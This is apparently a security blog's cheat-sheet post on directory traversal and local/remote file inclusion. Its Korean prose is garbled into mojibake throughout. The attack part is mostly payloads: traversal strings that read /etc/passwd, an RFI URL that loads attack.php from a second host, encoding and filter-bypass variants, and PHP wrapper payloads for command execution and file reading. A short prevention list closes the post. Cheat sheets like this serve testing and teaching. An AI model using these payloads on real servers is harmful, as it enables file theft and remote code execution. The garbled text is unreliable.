Search
Directory traversal & LFI,RFI
2 min read

Directory traversal & LFI,RFI

UseeGod's Picture
UseeGod in CheatSheet

Directory traversal

๐Ÿ”Ž What is Directory traversal?

Directory traversal(also known as file path traversal)์€ ๊ณต๊ฒฉ์ž๊ฐ€ ์‘์šฉ ํ”„๋กœ๊ทธ๋žจ์„ ์‹คํ–‰ํ•˜๋Š” ์„œ๋ฒ„์—์„œ ์ž„์˜์˜ ํŒŒ์ผ์„ ์ฝ์„ ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค. ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ฝ”๋“œ ๋ฐ ๋ฐ์ดํ„ฐ, ๋ฐฑ์—”๋“œ ์‹œ์Šคํ…œ์— ๋Œ€ํ•œ ์ž๊ฒฉ ์ฆ๋ช…, ๋ฏผ๊ฐํ•œ ์šด์˜ ์ฒด์ œ ํŒŒ์ผ์ด ํฌํ•จ๋  ์ˆ˜ ์žˆ์œผ๋ฉฐ ๊ฒฝ์šฐ์— ๋”ฐ๋ผ ๊ณต๊ฒฉ์ž๊ฐ€ ์„œ๋ฒ„์˜ ์ž„์˜ ํŒŒ์ผ์„ ์“ธ ์ˆ˜ ์žˆ์–ด ์‘์šฉ ํ”„๋กœ๊ทธ๋žจ ๋ฐ์ดํ„ฐ๋‚˜ ๋™์ž‘์„ ์ˆ˜์ •ํ•˜๊ณ  ์„œ๋ฒ„๋ฅผ ์ œ์–ดํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

direc

๐Ÿ”Ž What is difference beetween Directory traversal and LFI, RFI?

LFI(Local File Inclusion), RFI(Remote File Inclusion) ์™€ Directory traversal์˜ ๊ฐ€์žฅ ํฐ ์ฐจ์ด์ ์€ ํŒŒ์ผ์„ ์‹คํ–‰์‹œํ‚ฌ ์ˆ˜ ์žˆ๋ƒ์˜ ์ฐจ์ด์ž…๋‹ˆ๋‹ค. ๊ฒฝ๋กœ ํƒ์ƒ‰ ๊ฐ™์€ ๊ฒฝ์šฐ๋Š” ๋‹จ์ˆœํ•˜๊ฒŒ ํŒŒ์ผ์„ ์ฝ๊ธฐ๋งŒํ•˜์ง€๋งŒ LFI,RFI๋Š” ํŒŒ์ผ์„ ์ฝ๊ณ  ์‹คํ–‰์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

# LFI
http://192.168.100.10/bWAPP/file.php?language=l../../../../../../etc/passwd&action=go
# RFI
http://192.168.100.10/bWAPP/file.php?language=http://192.168.5.6/attack.php
File path traversal, traversal sequences stripped non-recursively

์„œ๋ฒ„์—์„œ path๊ตฌ๋ฌธ(../)์„ ์ œ๊ฑฐํ•  ๊ฒฝ์šฐ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-04 แ„‹แ…ฉแ„’แ…ฎ 9 40 58

....//....//....//etc/passwd

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-04 แ„‹แ…ฉแ„’แ…ฎ 9 41 25


๐Ÿ”ฅ Cheat sheet

  • Basic exploitatin
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
  • 16 bits Unicode encoding
. = %u002e
/ = %u2215
\ = %u2216
  • UTF-8 Unicode encoding
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
  • Bypass "../" 
//Bypass "../" replaced by ""
..././
...\.\

//Bypass "../" with ";"
..;/
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
  • Double URL encoding
. = %252e
/ = %252f
\ = %255c
  • LFI PHP wrapper 
# expect:// (System command ์‹คํ–‰)
www.useegod/index.php?page=expect://ls
# php://filter (encode/decode ์˜ต์…˜์„ ์‚ฌ์šฉํ•˜์—ฌ ์„œ๋ฒ„ ๋‚ด๋ถ€ ํŒŒ์ผ ์—ด๋žŒ)
www.useegod/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
# zip:// (ํŒŒ์ผ์˜ ์••์ถ•์„ ํ’€๊ณ  ํŒŒ์ผ์•ˆ์— ์žˆ๋Š” ์ฝ”๋“œ ์‹คํ–‰)
www.useegod/index.php?page=zip://file.zip#shell.php

๐Ÿ‘€ How to Prevent ?

  • ์‚ฌ์šฉ์ž๋กœ๋ถ€ํ„ฐ ์ž…๋ ฅ ๋ฐ›์€ ๋””๋ ‰ํ„ฐ๋ฆฌ์™€ ํŒŒ์ผ๋ช…์— ๋Œ€ํ•œ ์ž…๋ ฅ ๊ฐ’ ํ•„ํ„ฐ๋ง ์ ์šฉ (๊ณต๋ฐฑ์œผ๋กœ ์น˜ํ™˜ ์‹œ ์šฐํšŒ๊ธฐ๋ฒ•์ด ์กด์žฌํ•˜๋ฏ€๋กœ ๋‹ค๋ฅธ ๋ฌธ์ž์—ด ๋“ฑ์œผ๋กœ ์น˜ํ™˜์„ ๊ถŒ๊ณ )
ํ•„ํ„ฐ ๋ฌธ์ž์—ด
../ ./ /. ..\ .\ % ; %00 %2F ๋“ฑ
  • ๋‹ค์šด๋กœ๋“œ ํŒŒ์ผ๋ช…์„ DB์— ์ €์žฅํ•˜๊ณ  ๋‹ค์šด๋กœ๋“œ ์‹œ ์š”์ฒญ ํŒŒ์ผ๋ช…๊ณผ ๋น„๊ตํ•˜์—ฌ ์ ์ ˆํ•œ์ง€ ํ™•์ธ
  • ๋‹ค์šด๋กœ๋“œ๋ฅผ ์ œ๊ณตํ•˜๋Š” ํŽ˜์ด์ง€์˜ ์œ ํšจ ์„ธ์…˜ ์ฒดํฌ ๋กœ์ง ํ•„์ˆ˜ ์ ์šฉ

๐Ÿ“ƒ References

You may also like

IP ๋Œ€์—ญ ๋ถ„ํ•  ํ‘œ
2 min read

IP ๋Œ€์—ญ ๋ถ„ํ•  ํ‘œ

UseeGod's Picture
UseeGod in CheatSheet
Bypass NAC
1 min read

Bypass NAC

UseeGod's Picture
UseeGod in CheatSheet
AWS Cheat Sheet
3 min read

AWS Cheat Sheet

AWS Cloud

UseeGod's Picture
UseeGod in CheatSheet Cloud

Latest Posts

Web3 ์ž๋ฃŒ ๋ชจ์Œ
1 min read

Web3 ์ž๋ฃŒ ๋ชจ์Œ

UseeGod's Picture
UseeGod
ํ† ํฐ๊ธฐ๋ฐ˜ ์ธ์ฆ์—์„œ bearer ๋ž€?
2 min read

ํ† ํฐ๊ธฐ๋ฐ˜ ์ธ์ฆ์—์„œ bearer ๋ž€?

UseeGod's Picture
UseeGod

Explore Tags

Android BugBounty CVE CheatSheet Cloud Error Git HTB IOS Reversing Web Web3